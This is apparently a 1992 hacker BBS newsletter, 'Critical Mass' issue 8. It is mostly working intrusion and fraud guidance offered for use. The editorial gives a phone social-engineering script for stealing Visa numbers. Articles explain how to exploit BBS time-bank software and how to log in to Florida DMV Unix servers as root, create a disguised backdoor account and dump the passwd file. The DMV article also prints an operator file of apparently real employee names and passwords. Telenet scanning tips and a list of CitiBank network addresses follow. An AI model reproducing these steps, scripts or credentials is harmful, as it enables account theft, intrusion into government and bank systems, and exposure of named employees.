Copy Link
Add to Bookmark
Report
Critical Mass 8
"Ah, the cold air..... Tis the season to be p/hacking...."
_____________________________________________________________________________
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
\ Critical Issue # 08 A Technical Text /
\ Mass ~~~~~~~~~~~ File Newsletter. /
\________________________________|____________________________________/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__________________________
__________ l___________ | ___________l
// \ _______ _____ l|l _____ ______ ___
// /~~~~~~~\_\ l \ l l l|l l l // \ _ l l
// / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l
<<<< ritical l / l l l|l l l // / / \ l l
\\ \ l < l l l|l l l <<<< / ___ \ l l
\\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____
\__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l
==--> ==-->
____ __ ____ ==--> <12/23/92>
l \ / l ass ==-->
l \ / l __ ______ ______
l \ / l / \ / \ / \ A Technical
l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter
l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~
l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 8
l l l l /_/ \_\ /~~~~ / /~~~~ /
~~~~ ~~~~ ~~~~~~ ~~~~~~
_____________________________________________________________________________
l Writters l Special thanks to.... l
l__________________________l________________________________________________l
l l l
l The Beaver l Shadow Hacker, Altos, Section 8, l
l Altos l Abigail, D.M., Black Knight, Number Cruncher l
l Black Knight l and many other that I forgot l
l l to include. l
l__________________________l________________________________________________l
Critical Mass Technical Newsletter is free to those who wish
to gain in further knowledge of topics of Telecommunications,
Datacommunications, Computer and Phone Security, Software and other
forms of piracy, explosives, and other forms of not widely known or
talked about topics.
All articles are totally original, unless stated otherwise.
We will not except unoriginal, plagiarized articles, or articles
that contain false information. We except articles from anyone who
is willing to follow these criteria, and as long the editors, writters
and S.A.O.O. members feel that the article is worthy to print.
We encourage all to download these files and pass them on
freely to others as long as credits of the editors, writer or
S.A.O.O. is not modified in any way.
There is no set date for release issues, but we attempt to
put them out as frequently as possible.
We now also offer BBS's outside the Tallahassee area to get
on our BBS listing. If you decide to get on this list, we will send
you issues as soon as they are produced.
We also now sponser a total legit network called, "UnRegNet".
The converstions included general hacking, basic and advanced hacking,
hacking Unix, hacking VMS, pyro <Explosives and fire>, anarchy <killing>,
pirate, and much more... Come and check it out.........
If you wish to become a part of UnRegNet, please leave mail on
UnRegNet in the HGENERAL to either The Beaver or Black Knight at one of the
following UnRegNet BBS's.....
Tower Of Power
<904>668-6745
The Speed Shop <TSS>
<904>PRI-VATE - Mail The Beaver for the number.
Silicon Nightmare
<904>PRI-VATE
If you have any questions pertaining to a article, please
leave E-Mail to the author of the article. If you cannot get in
contact with the author, please leave "The Beaver" mail at the
one of the BBS's above and he will try to put you in touch with the
author, and/or try to answer your questions.
SAOO Support Boards
The Speed Shop
<New SAOO Main!>
<904>PRI-VATE
Silicon NightMare
<904>PRI-VATE
To gain access to one of the following BBS's, please contact
the sysop of the board or a member of the SAOO.
If you wish to become a member of the S.A.O.O. please leave
The Beaver E-Mail, where he will send you an application for you to
fill out. From there, local S.A.O.O. members in your area will
consider you and take a vote on if at that date you can become a
member.
We are always looking for experienced and even
non-experienced p/hackers to join. Only after a back-ground check and
the vote, will you be let in. If you fail to get in, do not be mad,
we have turned down many people. Simply wait, improve the reasons
that you where not let in, if possible, and in the mean time, learn.
We are also looking into other remote S.A.O.O. support
boards to net with and share information with. In the event that
you would like to support a S.A.O.O. chapter in your area, please
contact a member of the Tallahassee S.A.O.O. Benefits do come.
Head Chief And Writer - The Beaver
Editor - Altos
Members - <S>ilicon <A>luminum <O>xidation <O>rganization.
If you wish to become a distribution point for Critical Mass, please
E-Mail the Beaver, and I will add you to the list. You will get your
copy of Critical Mass as soon as they are produced.
This Issues Articles Include:
I. - Editorial
By The Beaver
II. - How To Bust Into Systems <TimeBanks That Is!>
By Black Knight
III. - Hacking Florida DMV
By The Beaver
IV. - Basic Telenet <With NUA's>
By Altos
V. - CitiCorp/CitiBanks Telenet NUA's
By The Beaver and Altos
VI. - SAOO Telenet Scan <The "Thousand" Scan>
By The Beaver
VII. - Basic Anarchy For The Youngsters.
By Penial Implant
VIII. - Finnal Notes
________________________
Editorial
By The Beaver
________________
Yes, Yes, Yes.... Welcome one, welcome all to yet another Critical
Mass.... What do you say that we stop and take a look around us for a
moment..........
God... It seems that we have come upon yet another Xmas. We all
knows what this means... More public mail like "HI, MY NAME IS TIM. tHIS
iS MY FIRST TIME ON A bBS!". Which will lead to, "wheres the k-k00l killer
kean warez!"... Ahh, well.. we all have to start somewhere.
To thoughs whom do not know, UnRegNet IS underway! Yes, thats right
Tallahassees first echo on the topics of P/Hacking, Piracy, Explosives,
drugs, and just general all American chaos is discussed. I want to get a
little something straight here, before some people start posting "killer
k0dez" and stuff on the echo.... The echo is legit... Yes, it is total
legal, which basicly means that you cannot post information that is
of a illegal nature....<I.E. - Credit card numbers, hack accounts/codes,
etc>..... However, since we do live in a country where we can all yell at
any given point in time, "I plead the 5th", and along with the great
tradition of, "Its information, thats all.... You have heard of the first
amendment you S.S. commie swine you?", you can discuss the method of general
hacking......
We also invite other people to get involved in the echo, such as
Computer Security Specialist, and people whom are against p/hacking in
general.... We <Well most of us> love to hear the imorals of hacking.
If you even got a gripe about the whole thing, please do tell... Let me
state again, however, that this is a legal net, and not a flame echo...
Keep it within reason...... If you do have a gripe, please leave it in the
Anti-Hacker area only...
In other local news, the local community has lost some great BBS's
in our local area. One of which was Section 8's old BBS along with the
viral collector king, Dr. Strangelove.
I found this out the other day.... Seems that ole Centel is trying
to pull a fast one on there ANI <Automatic Number Identifiers> dialups.
DM and I embarked on a 3 digit scan to find Centel's new ANI's. Low and
behold, after scanning over 700 numbers, they move the damn ANI to a
4 digit exchange!
Welp, considering that there is no need for you to do the work <and
besides the fact, I got the new ANI while looking over a Centel linemans
shoulder!>, here it is.... Dial 7118. What is ANI you ask? Well, I will let
you dial it and decide... Basicly, this will tell you any fone number <Within
Leon County> that you are dialing from....
Heres some other information that was not enough to make it to
actual articles. Actually, some of them I heard/read about, but I will
share with you anyway.
Fact: FDLE's <Florida Dept or Law Enforcement> database is ONLY 2 gig!
Every want a credit card number <Visa, Mastercard, Etc>, but just
just could not find the means? Welp, here is what you do. Pull the following
social engineer........ First go to a fortress/loop/whatever!
Mark - "Hello."
You - "Yes, This is Dave at CitiBank Security. We have seem to
have had a computer break-down and there is a problem with
your VISA and you will not be able to make anymore trans-
actions until it is re-entered. Can you give me you VISA
number?"
Mark - "Ahhhh, I don't know, this sounds a little fishy, buddy.
I got a idea, how about I call you...."
You - "I understand that you are reluctant. Here you go, this is
my office number. <Give him the Fortress/loop/whatever
number>"
Mark - "Okay, bye."
You - "Goodbye."
<Wait a little while>
RING!
You - "Citibank Security, This is Dave, how may I help you?"
Mark - "Ahh, okay.... I thought this might be a scam or something.
Anyrate, my VISA number is blah, blah, blah....."
Easy as that.
I don't know about you, but if you want LD codes/extenders, VMB
passcodes, etc, there is one really neat way to do it. I was
reading a few days ago in Phrack, or maybe it was Phun. Anyrate,
They had a article on using scanners to intercept fone <Cellular,
Portable and Airline> conversation, along with other freq's,
such as bugs, FBI, etc, etc. Now, lets say you hooked up a tape
recorder to you scanner via the earfone jack and recorded stuff.
Lets say, you drop into Airline fones. You are gonna get codes!
The same with cellular and maybe even portable fones. I know what
I want for Xmas!
Centel looks like it will be finally bought out by US Sprint! Centel
has been quoted as saying that they would not upgrade Leon County
telefone equipment until they where sure that US Sprint was indeed
going to buy them out. This explains alot of the trouble with our
local telefone system here.
Speaking of trouble, in the 385 trunk, some of you that are in it
may experience trouble in that your calls will seem to be "diverted"
<The remote fone rings then you get a dialtone before the remote
party answers> or get other peoples conversations. I called Centel
and talked to a tech there, this is what he has to say.....
"Yeah, on the 385 trunk, in some areas, when it get moist out
the lines cross over, thus shorting out."
"When will it be fixed?"
"Thats hard to say, seems that it is a tough problem to fix. Tall-
ahassee only has on prefix in town that has fiber optics. There
is really no telling."
I believe the prefix he was refering to was the 942, though I
am not sure at this time.
According to Tallahassee local news, DMV <Dept. Of Motor Vec.> is
changing its format used on there local computer systems. It seems
that more people will have access to your driving records. The new
system will give information pretaining to tickets, DUI, expired
tags, etc, etc. The majority of the users look like they will be
people like Budge Rent'a Car, and other car rentals.
The system will also work alot easier than it currently does.
All one must know is the Name. Currently <See hacking DMV in this
issue of Critical Mass>, one needs a alot of information such as
VIN's, Tag numbers, specific dates, etc. What this will allow the
curious hacker is a more than easy way to find out the same
information.
Strange NUA:
If you can, connect to the following NUA from your local Telenet/
Whatever dialup...........
224206 < its in the 3110 Telenet DNIC >
This will give you a list of Hong-Kong flight schedules. Just
fun to show you friends!
___________________________________
How To Bust Into Systems
(Time Bank Systems, That Is!)
By Black Knight (Of Course!)
____________________________
I'd first like to let everyone know that I did not find all of these
by myself. I was given how to do two of these by other people, but I'm just
showing them so that you can do them yourself; I am NOT taking credit for
them. Anyway, here they are:
1) How To Get Extra Time With Searchlight
With one of the older versions of Searchlight, it came with a time bank
that was EXTREMELY faulty. The only things you could do was withdraw,
deposit, and quit. Unfortunatly, since most people don't use Searchlight
and don't have that old version, this will usually not work. But, it's
worth a shot.
What you need to start out with is to use all but three minutes of your
on-line time. Then go to the Time Bank. In there, you will want to
deposit your time. It will say how much time you have available to
deposit and ask you how much you wish to deposit. You will want to
deposit as much time as it says you can, probably about two or three
minutes. So type in "2" or "3". BUT, don't press enter. You know have
to wait. How long? Well, how about two or three minutes? After you
think you're time would've run out, press enter. It will exit you back to
the main menu of the Time Bank and say you have about 16000 minutes left.
Good job!
This Time Bank scam works on the fact the the Searchlight Time Bank works
on a cycle theory. When you're waiting for the two or three minutes, the
time bank is still clicking it's time away. So after waiting, your time
remaining is actually zero or less. So after depositing two or three
minutes, which you don't have, you will definitly have a negative value
for your time remaining. This is where the cycle comes in. The Time
Bank essentially "thinks" that you have negative time. and since that is
obviously impossible, it just wraps your time around to the maximum value.
Although this is a great trick, you are only allowed to deposit 2000
minutes or so. Oh well!
2) How To Get Extra Time With HamBank
This is a proven trick you can pull with HamBank version 1.2. This is
extremely easy to do and takes virtually no effort. A user of mine
suddenly had 500 minutes remaining one day. I said "How in the HELL did
you do that?". Of course, he wouldn't say, so I watched him and
eventually figured out the trick. Of course, I drop his time down to
nothing after he does it, but it's worth a shot, isn't it?
You first need to find a board that uses HamBank; usually an RA, QBBS or
XBBS. As soon as you log on, feel free to go right to the Time Bank. If
you already have some time in there, withdraw all of it. Then exit back
to the BBS. Now go back to the Time Bank. Now you'll have around 100
minutes or so... doesn't really matter, but the more the better. Either
way, once in the Time Bank the second time, deposit all but five minutes
of your time. It will say something like "Do you wish to deposit this
amount? (y/N)". Of course, you press "Y" and then hit enter. As soon as
you hit enter, drop carrier. Then call the BBS back. You will have the
same amount of time that you had when you return from the time bank after
withdrawing all you time, about 100 minutes or so.
This works on the fact that HamBank is stupid. Really! After you deposit
your time, HamBank ASSUMES that you've done nothing while in the program.
So of course, it reports back to RA, QBBS, whatever that you've done
nothing and to maintain the same amount of time as when you shelled out.
BUT, HamBank was even more stupid because it saved your HamBank banking
account before you hung up. Therefore, you have your 100 minutes or so in
both RA AND HamBank. But as I suggest that after doing this, you do not
log right back on. Wait an hour or two and then log on so that the SysOp
doesn't notice anything. Give this a shot, it works great!
3) How To Get Extra Time With Remote Access Timebank Service
This is another scam, but I figured this one out on my own. This is a lot
like the Hambank scam, but goes the opposite direction. Although most
boards these days don't use Remote Access Timebank Service (hereon
mentioned by RATS), this is still a good thing to do.
First you need to find a board that carries this Time Bank (usually an RA
board <GRIN>). Anyway, once on, you need to start with about 30 minutes
or so. Enter the bank and deposit around 30 minutes. Now, exit back to
RA. After returning to RA, go BACK to RATS. Now, this time withdraw your
deposited time. After it "says" that it saved your account, hang up.
Call back the board. RA says that you have all your time back again.
Enter RATS and you'll see that all your time is still in there. All you
need to do is keep calling back the board, withdrawing time, and hanging
up. Lot's oh phun.
This works by two facts. First, RATS is old as a mother-fucker. Second,
RATS is more stupid than HamBank. When you deposit your 30 minutes into it,
it is just saving your account in EXITINFO.BBS, not the actual RATS
account. But when you exit back to RA, that's when it saves. And when
you withdraw your time, all it's doing is editing the EXITINFO.BBS and
when you hang up, it assumes you've done nothing and it goes ahead and
exits without saving your account. But of course, when RA sees that you
have some extra time, it will save your account and then hang up.
Try all of these out, they are great phun. In the meanwhile, I'll be writing
my own Time Bank <GRIN>. Really though, if you figure out how to bust another
Time Bank, please let me know. You can contact me on my board, The Tower of
Power, via (9o4) 668-6745, FidoNet 1:36o5/256, or UnRegNet 222:13oo/4.
laTeR...
- Black Knight
- Member of UnRegNet
- Sysop Of Tower Of Power
<904>668-6745
_____________________________
Hacking DMV
By The Beaver
_________________
This articles focus is on DMV <The Dept. Of Motor Vec.>, and
the security around there machines..... It is fairly straight
forward, and though I cannot say that all DMV machines are
the same, most servers probably are...... The machines discussed
here are in the local <Tallahassee> area.
--------------------------------------------------------------
Ok, first off, you will want to find a DMV server, correct?
Well, As much as I would like to, I cannot give the number,
because everone would hack'em and that would be a major
hassle, plus the fact that someone would get busted....
However I will tell you that one machine is located in the upper
487 prefix. <Above the 5000 exchange>. The rest is up to you.
DMV servers run under Unix, and it is unreal how easy to defeat
there security is.... It is simply a matter of knowing what
username to type in. On the DMV servers I have played with,
there is NO passwords on ANY of the accounts... This includes
root, sysadmin, who, uucp... You name it! Now, upon calling a
DMV machine, here what should happen.. When you call it, you will
have to wait a minute for the login prompt... Which should be
look something to this......
Northwoo
2400 login:
At which point, the first thing to do is login as root. Since DMV
machines hold no password, you should become superuser quite
easily. After that, do a "who" <Shows all users online>, you will
probaly see some non-interactive accounts on..... For saftey
reasons, do not login during working hours! I prefer sometime at
night.... Ok, after you look around a bit and see that you are
getting nowhere, go ahead and "cat" <sorta like the "type" command
on DOS and VMS machines> and capture the passwd file... This
will be in the etc directory... For example, here is what you
would do....
$ cd /etc
$ cat passwd
This will dump all the usernames on the system and along with
there encrypted password <this holds true with all Unix based
systems>.... Don't worry about the encrypted passwords, because
as I said, they don't use passwords at DMV! Here something
what you should get.....<BTW This is off a DMV machine>
root:x:0:3:0000-Admin(0000):/:
sa:x:0:0:SA Menus Login:/sa:/sa/sa.exec
sarem:x:0:0:SA Menus Remote Execution:/sa:/bin/sh
startup:x:0:0: Start Multi-User Mode:/:/etc/startup
shutdown:x:0:0: Multi-Single-Halt Mode:/:/etc/shutdown
reboot:x:0:0: System Reboot :/:/etc/reboot
halt:x:0:0: System Halt :/:/etc/halt
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/bin:
sys:x:3:3:0000-Admin(0000):/usr/src:
adm:x:4:4:0000-Admin(0000):/usr/adm:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:10:10:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
sync:x:20:1:0000-Admin(0000):/:/bin/sync
who:x:21:1:0000 Admin(0000):/:/bin/who
diag:x:22:1:User Diagnostic Tests:/tst:/bin/sh
lp:x:71:2:0000-lp(0000):/usr/spool/lp:
listen:x:81:4:0000-listen(0000):/:
setup:x:0:0:general system administration:/usr/admin:/bin/rsh
sysadm:x:0:0:general system administration:/usr/admin:/bin/rsh
checkfsys:x:0:0:check file system:/usr/admin:/bin/rsh
makefsys:x:0:0:make file system:/usr/admin:/bin/rsh
mountfsys:x:0:0:mount file system:/usr/admin:/bin/rsh
umountfsys:x:0:0:unmount file system:/usr/admin:/bin/rsh
frvis:x:201:201:frvis:/FRVIS:/bin/sh
help:x:0:0:frvis-help:/FRVIS:/FRVIS/help
sta0:x:100:201:Station Number 0:/FRVIS/OBJ:/FRVIS/OBJ/go
sta1:x:101:201:Station Number 1:/FRVIS/OBJ:/FRVIS/OBJ/go
sta2:x:102:201:Station Number 2:/FRVIS/OBJ:/FRVIS/OBJ/go
sta3:x:103:201:Station Number 3:/FRVIS/OBJ:/FRVIS/OBJ/go
sta4:x:104:201:Station Number 4:/FRVIS/OBJ:/FRVIS/OBJ/go
sta5:x:105:201:Station Number 5:/FRVIS/OBJ:/FRVIS/OBJ/go
sta6:x:106:201:Station Number 6:/FRVIS/OBJ:/FRVIS/OBJ/go
sta7:x:107:201:Station Number 7:/FRVIS/OBJ:/FRVIS/OBJ/go
sta8:x:108:201:Station Number 8:/FRVIS/OBJ:/FRVIS/OBJ/go
sta9:x:109:201:Station Number 9:/FRVIS/OBJ:/FRVIS/OBJ/go
sta10:x:110:201:Station Number 10:/FRVIS/OBJ:/FRVIS/OBJ/go
sta11:x:111:201:Station Number 11:/FRVIS/OBJ:/FRVIS/OBJ/go
sta12:x:112:201:Station Number 12:/FRVIS/OBJ:/FRVIS/OBJ/go
sta13:x:113:201:Station Number 13:/FRVIS/OBJ:/FRVIS/OBJ/go
sta14:x:114:201:Station Number 34:/FRVIS/OBH:/FRVIS/OBJ/go
Actually for the articles sake, this is a bit edited so that
it is not as long..... Now, lets take one of these guys and
examine it....
sarem:x:0:0:SA Menus Remote Execution:/sa:/bin/sh
^ ^ ^ ^
Username Password<none> Brief Discrition Shell
Now, look at the Shell field.... There are several types of
shells, such as sh <Standard Shell>, csh, and ksh <Kernal Shell>.
What does this mean? Shell are nothing more than work areas.
That is, if you are one of those three shells, you can work
at a Unix based level, meaning you are actually dealing with
the operating system itself, similar to when you login under
the root account.... You are working with Unix itself. Now
lets look at another......
sta10:x:110:201:Station Number 10:/FRVIS/OBJ:/FRVIS/OBJ/go
^ ^ ^ ^
Username Password Brief Discription Whats This!?!?
Hmmmm, look at where are shell should be.. there is no sh, csh or
ksh shell but rather "go" in the "/FRIVIS/OBJ" directory?!?
Actually it is rather simple... It is a program that is executed
at login, and this account has NO shell access. Look at it this
way, at DMV they had a choice to make everyone learn Unix or
create a simple menu system so that any idiot could us it <No
offense to any DMV people, but it is the truth>. Before we
go executing this menu system, would it not be nice to look like
everyone else that logs in other than standing out as the root
superuser? Heres what you do.... Logout and call back, this time
login under "sysadm", with, of course, no password. Just follow
instructions and make a new account, and call it sta50 or
something like that, so you won't stand out. Make it just like
the other sta accounts <See the passwd file above>, BUT when
it talks about a shell, tell it you want a "/bin/sh" shell, or
what ever you desire. Once you have made your new account, quit
and login under "sta50" with no password, and boom, you fit
right in, if someone looks at ya! But wait, with a "sh" shell you
are no longer superuser right? Wrong. If you hit any files that
are out of your access to touch, type "su" <For superuser>, and
of course, you will not be prompted for a password. Ok, thats
out of the way.... You fit right in... Now, lets go back to
this "go" thingy that we were discussing above.
<BTW I am aware of the fact that you can create logins using>
<vi editor, but for the articles sake, we will keep it simple>
Remember that the program was in the FRIVIS/OBJ directory, so
simply type.....
# cd /FRVIS/OBJ
^
Note: I am SuperUser
The cap's DOES matter.... When you see something in cap's, type
it that way! Ok, now we are in this directory where the program
"go" is.... We are a bit curious to see what this "go" thang
does.. So type.......
# exec go
Here is what you should get.....
M61L10- --------------------- LOG ON -------------------- CLERK:
ENTER OPERATOR NAME (__________)
ENTER YOUR ALLOWED_FUNCTIONS ( ) 1. TITLE ONLY
2. REGIS ONLY
3. REGIS/TITLE
4. CASHIER ONLY
5. TITLE/CASHIER
6. REGIS/CASHIER
7. REGIS/CASHIER/TITLE
NOTE: ENTER OPERATOR NAME AND ALLOWED FUNCTIONS AND PRESS RETURN.
IF CORRECT, YOU WILL BE PROMPTED FOR YOUR PASSWORD.
Oh, great! We have to login AGAIN! Never fear! Remember, we are
SUPERUSERS! So get out of this crap and re-login under your
fake account... Now, considering that the above is actually a
program that is asking for a password, we know that the program
must store the Usernames/Access levels/Passwords in a file.
So re-login, at go to the following directory like this....
# cd /FRVIS/DATA
In this directory, you can get a file called OPERATER, that contains
all the accounts that the people at DMV use...Once in this
directory, type......
# cat OPERATOR
Now, cat the file called "OPERATOR", it should look like this..
00000100NAME00 PASS00070000
00000101DIEFENDORF050967030000
00000102THOMAS 090265030000
00000103MOODY M 011538070000
00000104NAME04 PASS04030000
00000105NAME05 PASS05030000
00000106JACKSON C 050543030000
00000107HASLE BO 041449030000
00000108SHOUPE PAM081262030000
00000109CHAMBERS 042637070000
00000110RABONR 111152070000
00000111FRIERSON 031944070000
00000112MEDLEY D 021659030000
00000113MERRITT L 042159070000
00000114REED T 082160030000
00000115HILTON J ADASST070000
00000116MIDDLETOND041033040000
00000117CARPENTER 030868030000
00000118HENDERSONA123058030000
00000119FABIAN P 040538030000
00000120JACKSON A 061164030000
00000121HODGES S 092957070000
00000122CONE V 092731070000
00000123WILLIAMS R082757070000
00000124DRINKWATER112957030000
00000125STRUMSKI V043036030000
00000126KITTRELL 013063030000
00000127WILLIAMS S073170030000
00000128SHARPE B 051451070000
00000129FOUNTAIN 062834070000
00000130NAME01 PASS1 070000
00000131NAME1 PASS1 070000
00000132JORDAN MAGGOT070000
00000133CLERK20 AUTOAP060000
00000134CLERK27 AUTONM060000
00000135NAME35 PASS35070000
00000136NAME36 PASS36070000
00000137NAME37 PASS37070000
00000138NAME38 PASS38070000
00000139NAME39 PASS39070000
00000140NAME40 PASS40070000
00000199MAGGOT-1 MAGGOT070000
00000151UNISYS UNISYS070000
Now, to decipher this crap... Lets look at one.....
00000199MAGGOT-1 MAGGOT070000
^ ^ ^
Username Passwd Access Level
Ok, their username is Maggot-1, their password is Maggot and
their access level is 7000. Let me explain a little more about
how you came to this.... Go to the beginning of the string, now
count 8 places out... You will land on the M... From here you
can see how I got maggot-1. Now, move to the second maggot, and
go up to the first 0 you hit. Now anything past the zero is
the level... The lower the better..... Use levels 3000 preferably.
Here, let look at another......
00000135NAME35 PASS35070000
^ ^ ^
User Passwd Level
So the username is....... NAME35, Password35 at level 7000
<or what ever they call it>.
Now we can use DMV as it is supposed to be used. So go back to
the directory FRVIS/OBJ and execute go. Now when it asks you for
a operator name and password, you will know exactly what to do!
Before I leave you off hack'in DMV, let me state that DMV is
NOT in anyway fun to use. You must supply VIN's, Registration
dates, and it just a pain in the ass... The advanages are that
you can find out where people live, fone numbers <Private/
Non-Private line>, driving records, tag numbers, police cars
tag numbers....... Alot of shit! Chow!
---==<Beaver>==---
Moderator Hack! UnRegNet
Moderator Hacker! UnRegNet
Moderator VAX/VMS UnRegNet
Member SAOO
==================================
-+| Hacking the Telenet Network |+-
==================================
= Constructed by, =
= Altos =
+========+========+
============================|========|========|===================================
Some things to do while online with Telenet and Tymnet. While at the @ on
the Telenet system type "mail" or "C mail" or "telemail" or even "c telemail"
this access's telenets mail system simple entitled "Telemail" from there it
will ask "user name" or something like that type "phones" next it will prompt
you "password" enter "phones". The phones service has alot of worthy
information it will give you a menu to choose from the rest should be self
explanatory. Along with the other information on the phones service there
is a complete updated list of all Telenet access numbers which is conveinent.
Once you have tried the phones service also on telemail enter
"Intl/Associates" as the user name and "Intl" for the international access
numbers. If you are calling from overseas somewhere connect with an telenet
access number then type this Nua at the telenet @ prompt "311020200142" and
enter the username and password.
You might want to pick up a sort of a reference booklet on Telenet simply
again call the customer service number and ask them for "How to use Telenet's
Asychronus Dial Service" and give them your address which is self
explanatory. Another tidbit of info you would like to know if you already
didnt know that Telenet is owned by Us Sprint long distance service.
another way to obtain access to this network from your home or apartment
even a phone booth, you first need to know a number to connect to.
The international number is as follows: 1-800-424-9494, And the local
access number for telenet is 561-8830 E71 You need to
have your modem settings at E71 and your terminal at VT100, after you
connect you will see 'TERMINAL=' at this prompt you need to enter a
'@' and then press enter, you should then get a '@' at this prompt
enter your telenet address let's say we tried '655321'
EX: @ 655321
blah blah blah CONNECTED!
Virgin Island Coast Guard
Login> hack it!
Password> hack it!
After you have tried unsucessfully a few times, it will proceed to
bump you off so do not be alarmed by it, disconnection will (should)
occur after the incorrect password, not during entering a user or such
after you get booted it will send you back to the telenet prompt '@'
where you can again enter another address.
The first thing your going to have to have is your Access number it is
very easy to get your local access number. Simply call telenet at
1-800-TELENET that is thier customer service number and ask for your
dialup the operator will ask for your area code and prefix of your phone
number he/she will also ask your baud rate. There are many telenet
ports across the country and internationly with varying baud rates
from 110 bps (yuck) to 9600 (i wish i had) so you will want your
maximum baud port most locations have atleast 1200 many have 2400 and
not alot have 9600 ports like for big cities like Detroit and Los
Angeles at the end of the file i will list some useful numbers.
I. HOW TO USE THIS NETWORK
How to use this network was explain in short detail above, however ther
is more to the explainations on how to use this network, if you try to
enter just shit at the telent prompt '@' it will not recognize it, it
will come up with a '?' write under your telenet prompt, all the prompt
will except is address. Also not explained already is the format of
address, all address are not in the format of xxxxxx (6 digits) you
can have address like 123456.7, and so on, This is a clever little way
to find a back door to a system, let's give another example.
EX: 123456
REJECTING CONNECTIONS, TRY BACK LATER
Well yeah, it's true telenet address 123456 is rejecting, but
possibly 123456.5 isn't, and that is your way into a system
however, this doesn't always work. So you may end up logging
off and trying back later. Error messages are always going to
be learking around just waiting to get in the way of your hack
so I put together a few to watch for, and a brief explanation to
them in topic III
II. - TELENET TERMS
Not Available
Not Operating
Not Responding - Your net feed can't accept your request, and try it back
later.
Not Connected - You have entered a telenet command thats is only able to
be used while in a connection type 'cont' to get back in
a connection.
Not Reachable - A temporary probelm or condition keeps you from using the
network.
Password - This is the prompt which appears after you have entered an
NUI (Network User Idenifaction).
Invalid User ID
or Password - The NUI you used is not valid.
***Possible Data Loss*** - connection as been reset.
Refused Collect Connection - You must prepay for your connection.
Local Congestion - Your local Access number is busy. Try Again later.
Local Network Outage - A temporary problem is preventing you from using
the network.
Rejecting - Host computer system refuses to accecpt callers.
Local Disconnect - Your terminal has been disconnected.
Remote Procedure Error - Communication problem forced the network to clear
the network
Still Connected - You tried to access another address while still on-line
with another.
Telenet XXX XXX - Network Port you are logged in on.
Terminal - This is the terminal type prompt (VT100, ANSI, VT52, ETC.)
Unable to validate call - Your NUI has been temporarily disabled.
Unable to validate call contact admin - The NUI has been permently disabled!
Unknown adress - Your chosen NUA (Network User Adress) may be invalid.
WATS Call not permitted - Telenet In-wats calls are not permitted by your
host or your NUI.
Access to this adress not permited - Your NUI is not authorized to connect
to this adress. (NASA, CIA, FBI, BANKS,
ETC)
Here is some little tid's n' bit's of shit that could help alond the way:
Telenet Costumer Services 1-800-TELENET
Tymnet Customer Services 1-800-872-7654
Local Access Number 561-8830 2400bps.
III. - SCANNING THE TELENET NETWORK
There are hundreds, hell even thousands and thousands of address, some to bank
systems, some to airport scheduling, and even NASA, ranging from 333 to
a address like 9999999, so if you are a real serious telenet'r you should get
some software made to scan telenet. There is a program currently out in the
Local area here called TSCAN*.*, put out by 'The Beaver', a member of the
SAOO, you can get access to this software on a few boards, it may require
asking around. After you get the software you need to configure it to your
standards, then begin scanning adresses, TSCAN is fairly easy to use and
will auto log the address scanned and the systems found on telenet, This is
by far the best scanner you can get currently
IIII. - LIST OF A FEW NATIONAL TELENET ADRESSES (CITICORP)
<CitiCorp and CitiBank Machines>
<"1000's" Scan">
______________________________________________
CitiCorp And CitiBank Around The World
By The Beaver
______________________________________
A while back, I was scanning around on telenet to find
something to work on... This was during my "thousand"
scan, and while scanning I hit a CitiCorp machine.
After a little bit of research, I found a pattern to
there machines, and was able to find CitiCorp cash
management machines, banks all over the world and
mail systems around the world...The following are
reachable though Telenet. If you have no idea about
Telenet, please read CM#6 and CM#7 <SAOO Telenet Scans>
for more information.
224XX Information
---------------------------------------------------------------------------
22400 - Citi Cash Management
New York/Delaware Checking Region, Checking Manager, Cash Pathway
region, Paperless Entry Process System, Message Network Information
System, CICS, Billing Information, Global Clearing System/CICS
region, "host40" Time sharing option, Internation Disbursemen
region, Global Clearing System CPCS Region, Total Report Management.
22401 - Same As Above
22402 - Global Report - VAX/VMS
22403 - Global Rebort from CitiCorp
22404 - Prime/Primos "PROD-A"
22405 - DECServer. Bit hard to get on, so try "?" and/or a few things
22406 - CitiBank Canada - VTAM Server that is accessable to New York,
Delaware and COSMOS II in Canada
22409 - Global Report from CitiCorp
22410 - CitiBank Network Of Brasil
22411 - "*** WELCOME TO C/C/M ***". Unknown, probably CitiCorp
22412 - Prime/Primos
22413 - "*** WELCOME TO C/C/M *** INT'L 3 ***"
22414 - "*** WELCOME TO C/C/M *** INT'L 3 ***"
22416 - CitiBank Frankfurt - Networking VBS
*22417 - Routes though a DECServer. Autologs to a VAX/VMS, however, you
can hit control-z or wait for it to timeout and it will drop
you to "local" mode at the DECServer!
*22420 - CitiCorp DECServer, with lots of services!
Mostly in the London Area, as far as I can tell.
22421 - Unknown
22422 - Unknown
22423 - CitiBank N.A. Bahrain
22424 - "Your call has been diverted for network user validation" - Unknown
22426 - Unknown
22427 - CitiBank Of Johannesburg
*22428 - VCP Server <Ripoff of a DECServer>. Lots of CitiCorp Machines, plus
lots of users online!
22430 - CitiBank Of Piraeus
22431 - ADAM_COSMOS. Prime running PrimOS <CitiBank>
22432 - CitiBank, But unknown due to it locks... Location Unknown
22433 - Same as 22432
22434 - CitiBank Of London
22435 - DUBLIN_COSMOS. Same as ADAM_COSMOS. Prime running, but of course
, PrimOS <CitiBank>
22436 - CitiBank Regional System In Singapore
22438 - CitiBank Of London
22439 - CitiBank of Milan
22440 - CitiBank Of Athens - HERMES System
22441 - CitiCorp/CitiBank
22442 - CitiBank, Location Unknown.. System locked
22443 - CitiBank Of Vienna COSMOS, Prime Computer running PrimOS
22444 - CitiBank Of Lewisham
22445 - Prime/Primos "NORDIC", Copenhage
22446 - Prime/Primos "NORDIC", Helsinki
22447 - "Enter Secure Access ID".
